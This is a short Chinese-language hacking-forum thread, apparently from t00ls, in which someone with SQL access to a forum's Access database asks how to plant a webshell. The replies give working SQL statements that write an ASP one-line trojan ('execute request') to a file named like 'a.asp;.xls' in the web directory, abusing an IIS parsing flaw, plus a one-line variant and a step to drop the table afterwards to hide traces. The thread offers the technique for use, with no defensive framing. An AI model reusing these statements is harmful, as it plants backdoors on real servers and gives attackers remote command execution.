一個垃圾論壇，access數據庫，無其他可利用之處，不過有個sql語句執行功能，絕對路徑也知道，小弟對sql語句不懂，記得如果是mysql數據庫root權限可以導出SHELL，這個是否也能導出shell呢？需要什么條件，語句又是什么？網上翻不到資料。麻煩各位。
答：
create table cmd (a varchar(50))
insert into cmd (a) values ('<%execute request("a")%>')
select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd
drop table cmd
解釋如下：
1.create table a (a varchar(50)) 建立一個有一個A字段的表 表名為a 字段類型為字符 長度為50
2.insert into a (a) values ('<%execute request("a")%>') 在表a的a字段插入密碼為a的一句話木馬
3.select * into [a] in 'F:\jt\work\a.asp;.xls' 'excel 4.0;' from a 把表a的內容導出為物理路徑的一個
EXCEL文件，為什么用excel文件，因為ACCESS數據庫不允許導出其他危險格式。我們導出為EXCEL后在利用IIS解析漏洞就可以變成我們的小馬了。很*的說～～
4.drop table a 丟家伙閃人 射完就走！

小弟的提問，沒兩分鐘大家就回答了，強烈頂t00ls牛淫。
這個更簡單：
Access利用后臺SQL執行命令功能導出WebShell:
SELECT '<%execute request("a")%>' into [vote] in 'd:\web\x.asp;.xls' 'excel 8.0;' from vote
后臺提供SQL執行功能且知道絕對路徑方可使用(vote為已知表段)

關健詞：ACCESS